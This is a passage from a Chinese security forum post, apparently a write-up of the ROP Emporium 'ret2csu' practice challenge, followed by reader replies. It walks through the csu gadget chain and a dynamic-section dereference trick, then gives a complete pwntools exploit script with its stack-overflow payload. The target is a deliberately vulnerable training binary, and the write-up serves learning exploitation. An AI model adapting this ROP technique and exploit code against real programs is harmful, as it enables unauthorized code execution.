0x00000000004006a1 : pop rsi ; pop r15 ; ret
0x000000000040069d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x00000000004004e6 : ret

Unique gadgets found: 11

main函数下面一点可以看到csu函数,这里提供了有用的片段:

.text:0000000000400680 loc_400680:                             ; CODE XREF: __libc_csu_init+54↓j
.text:0000000000400680                 mov     rdx, r15
.text:0000000000400683                 mov     rsi, r14
.text:0000000000400686                 mov     edi, r13d
.text:0000000000400689                 call    ds:(__frame_dummy_init_array_entry - 600DF0h)[r12+rbx*8]
.text:000000000040068D                 add     rbx, 1
.text:0000000000400691                 cmp     rbp, rbx
.text:0000000000400694                 jnz     short loc_400680
.text:0000000000400696
.text:0000000000400696 loc_400696:                             ; CODE XREF: __libc_csu_init+34↑j
.text:0000000000400696                 add     rsp, 8
.text:000000000040069A                 pop     rbx
.text:000000000040069B                 pop     rbp
.text:000000000040069C                 pop     r12
.text:000000000040069E                 pop     r13
.text:00000000004006A0                 pop     r14
.text:00000000004006A2                 pop     r15
.text:00000000004006A4                 retn

上半部分可以给这三个寄存器赋值然后call一个地址,需要我们能控制r13,r14,r15三个寄存器,以及rbx=0,r12=call win函数

下半部分能满足我们要控制的寄存器的要求

思路:

  1. 溢出跳转到csu函数后半部分,给寄存器赋值
  2. 然后再跳转到csu函数前半部分,调用win函数

但是这里存在一个问题,就是赋值rdi的那个指令:

.text:0000000000400686                 mov     edi, r13d

只能赋值4字节,高4字节赋值不了,所以不能通过call [r12+rbx*8]调用win函数

这里需要解引用到一个无关紧要的函数上

小知识点,需要解引用找函数跳板去elf的LOAD段去找:

LOAD:0000000000600E00 01 00 00 00 00 00 00 00 01 00 _DYNAMIC        Elf64_Dyn <1, 1>        ; DATA XREF: LOAD:0000000000400130↑o
LOAD:0000000000600E00 00 00 00 00 00 00                                                     ; .got.plt:_GLOBAL_OFFSET_TABLE_↓o
LOAD:0000000000600E00                                                                       ; DT_NEEDED libret2csu.so
LOAD:0000000000600E10 01 00 00 00 00 00 00 00 38 00…                Elf64_Dyn <1, 38h>      ; DT_NEEDED libc.so.6
LOAD:0000000000600E20 1D 00 00 00 00 00 00 00 78 00…                Elf64_Dyn <1Dh, 78h>    ; DT_RUNPATH .
LOAD:0000000000600E30 0C 00 00 00 00 00 00 00 D0 04…                Elf64_Dyn <0Ch, 4004D0h> ; DT_INIT
LOAD:0000000000600E40 0D 00 00 00 00 00 00 00 B4 06…                Elf64_Dyn <0Dh, 4006B4h> ; DT_FINI
LOAD:0000000000600E50 19 00 00 00 00 00 00 00 F0 0D…                Elf64_Dyn <19h, 600DF0h> ; DT_INIT_ARRAY
LOAD:0000000000600E60 1B 00 00 00 00 00 00 00 08 00…                Elf64_Dyn <1Bh, 8>      ; DT_INIT_ARRAYSZ
LOAD:0000000000600E70 1A 00 00 00 00 00 00 00 F8 0D…                Elf64_Dyn <1Ah, 600DF8h> ; DT_FINI_ARRAY
LOAD:0000000000600E80 1C 00 00 00 00 00 00 00 08 00…                Elf64_Dyn <1Ch, 8>      ; DT_FINI_ARRAYSZ
LOAD:0000000000600E90 F5 FE FF 6F 00 00 00 00 98 02…                Elf64_Dyn <6FFFFEF5h, 400298h> ; DT_GNU_HASH
LOAD:0000000000600EA0 05 00 00 00 00 00 00 00 C0 03…                Elf64_Dyn <5, 4003C0h>  ; DT_STRTAB
LOAD:0000000000600EB0 06 00 00 00 00 00 00 00 D0 02…                Elf64_Dyn <6, 4002D0h>  ; DT_SYMTAB
LOAD:0000000000600EC0 0A 00 00 00 00 00 00 00 7A 00…                Elf64_Dyn <0Ah, 7Ah>    ; DT_STRSZ
LOAD:0000000000600ED0 0B 00 00 00 00 00 00 00 18 00…                Elf64_Dyn <0Bh, 18h>    ; DT_SYMENT
LOAD:0000000000600EE0 15 00 00 00 00 00 00 00 00 00…                Elf64_Dyn <15h, 0>      ; DT_DEBUG
LOAD:0000000000600EF0 03 00 00 00 00 00 00 00 00 10…                Elf64_Dyn <3, 601000h>  ; DT_PLTGOT
LOAD:0000000000600F00 02 00 00 00 00 00 00 00 30 00…                Elf64_Dyn <2, 30h>      ; DT_PLTRELSZ
LOAD:0000000000600F10 14 00 00 00 00 00 00 00 07 00…                Elf64_Dyn <14h, 7>      ; DT_PLTREL
LOAD:0000000000600F20 17 00 00 00 00 00 00 00 A0 04…                Elf64_Dyn <17h, 4004A0h> ; DT_JMPREL
LOAD:0000000000600F30 07 00 00 00 00 00 00 00 70 04…                Elf64_Dyn <7, 400470h>  ; DT_RELA
LOAD:0000000000600F40 08 00 00 00 00 00 00 00 30 00…                Elf64_Dyn <8, 30h>      ; DT_RELASZ
LOAD:0000000000600F50 09 00 00 00 00 00 00 00 18 00…                Elf64_Dyn <9, 18h>      ; DT_RELAENT
LOAD:0000000000600F60 FE FF FF 6F 00 00 00 00 50 04…                Elf64_Dyn <6FFFFFFEh, 400450h> ; DT_VERNEED
LOAD:0000000000600F70 FF FF FF 6F 00 00 00 00 01 00…                Elf64_Dyn <6FFFFFFFh, 1> ; DT_VERNEEDNUM
LOAD:0000000000600F80 F0 FF FF 6F 00 00 00 00 3A 04…                Elf64_Dyn <6FFFFFF0h, 40043Ah> ; DT_VERSYM
LOAD:0000000000600F90 00 00 00 00 00 00 00 00 00 00…                Elf64_Dyn <0>           ; DT_NULL

这里保存了很多函数的地址,解引用拿到的就是函数本身,其中0x600E40的函数dt_fini:

.fini:00000000004006B4                                               public _term_proc
.fini:00000000004006B4                               _term_proc      proc near               ; DATA XREF: LOAD:00000000004003A8↑o
.fini:00000000004006B4 48 83 EC 08                                   sub     rsp, 8          ; _fini
.fini:00000000004006B8 48 83 C4 08                                   add     rsp, 8
.fini:00000000004006BC C3                                            retn
.fini:00000000004006BC                               _term_proc      endp

不会对我们的参数和布局产生影响,太适合了

接下来是:

.text:000000000040068D                 add     rbx, 1
.text:0000000000400691                 cmp     rbp, rbx
.text:0000000000400694                 jnz     short loc_400680

这里rbp和rbx都是之前控制的,我们需要让这个跳转不成立,就需要rbx+1==rbp的值

完成之后,再rsp+8,pop6个值之后就是下一个返回地址,从这里去修改rdi为目标值,然后跳转去win函数即可

exp:

#!/bin/python3
from Crypto.Util.number import *
from pwn import *
warnings.filterwarnings(action='ignore',category=BytesWarning)
context.log_level = 'debug'
FILE_NAME = "ret2csu"
REMOTE_HOST = ""
REMOTE_PORT = 0

elf = context.binary = ELF(FILE_NAME)
libc = elf.libc

gs = '''
'''
def start():
    if args.REMOTE:
        return remote(REMOTE_HOST,REMOTE_PORT)
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    else:
        return process(elf.path)

# =======================================

io = start()

# =============================================================================
# ============== exploit ===================

"""
.text:0000000000400680 loc_400680:                             ; CODE XREF: __libc_csu_init+54↓j
.text:0000000000400680                 mov     rdx, r15
.text:0000000000400683                 mov     rsi, r14
.text:0000000000400686                 mov     edi, r13d
.text:0000000000400689                 call    ds:(__frame_dummy_init_array_entry - 600DF0h)[r12+rbx*8]
.text:000000000040068D                 add     rbx, 1
.text:0000000000400691                 cmp     rbp, rbx
.text:0000000000400694                 jnz     short loc_400680
.text:0000000000400696
.text:0000000000400696 loc_400696:                             ; CODE XREF: __libc_csu_init+34↑j
.text:0000000000400696                 add     rsp, 8
.text:000000000040069A                 pop     rbx
.text:000000000040069B                 pop     rbp
.text:000000000040069C                 pop     r12
.text:000000000040069E                 pop     r13
.text:00000000004006A0                 pop     r14
.text:00000000004006A2                 pop     r15
.text:00000000004006A4                 retn
"""
csu1 = 0x000000000400680 
csu2 = 0x00000000040069A             
call_win = 0x000000000400510         
pwnme_got = 0x000000000601018
pop_rdi = 0x00000000004006a3 #: pop rdi ; ret
safe_deference = 0x000000000600E48

rdi = 0xDEADBEEFDEADBEEF
rsi = 0xCAFEBABECAFEBABE
rdx = 0xD00DF00DD00DF00D
rbp = 0x000000000601028

payload = b"A" * 0x28
payload += pack(csu2)
payload += pack(0)+pack(1) + pack(safe_deference) + pack(rdi) + pack(rsi) + pack(rdx)
payload += pack(csu1)
payload += pack(0)*7
payload += pack(pop_rdi) + pack(rdi)
payload += pack(call_win)
io.sendafter(b"> ",payload)

io.interactive()

运行结果:

ret2csu.zip.d ➤ python3 exp.py
Thank you!
ROPE{a_placeholder_32byte_flag!}

总结

8个练习最有难度的对我来说就是fluff去理解两个陌生的指令,其他的嘛,基本上就是出啥躲啥

我愿称之为:一次不错的查漏补缺之旅

免费评分

参与人数 11威望 +2 吾爱币 +110 热心值 +11 收起 理由
ioyr5995 + 1 + 1 我很赞同!
Shenwei520 + 1 + 1 我很赞同!
yxlch + 1 + 1 我很赞同!
allspark + 1 + 1 用心讨论,共获提升!
fengbolee + 2 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
willJ + 2 + 100 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
1783780690 + 1 + 1 我很赞同!
offerking + 1 + 1 我很赞同!
Atnil + 1 + 1 谢谢@Thanks!
Zrh1024 + 1 用心讨论,共获提升!
hackcat + 1 + 1 我很赞同!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

沙发
yan999 发表于 2024-8-9 16:01
赞!!!
3#
A-boy 发表于 2024-8-9 16:11
4#
w1066602520 发表于 2024-8-9 16:24
5#
tianxingjian146 发表于 2024-8-9 17:12
可以可以可以
6#
zjh889 发表于 2024-8-10 00:10
谢谢楼主,俺们学习了!
7#
binghe01 发表于 2024-8-10 00:35
我也想pwn呀,师傅加油
8#
 楼主| kn0sky 发表于 2024-8-10 16:18 |楼主
binghe01 发表于 2024-8-10 00:35
我也想pwn呀,师傅加油

想pwn就pwn啊
9#
offerking 发表于 2024-8-11 06:51
支持,学习了
10#
yufLee 发表于 2024-8-13 11:39

真不错,学习到了
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-9-7 16:56

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表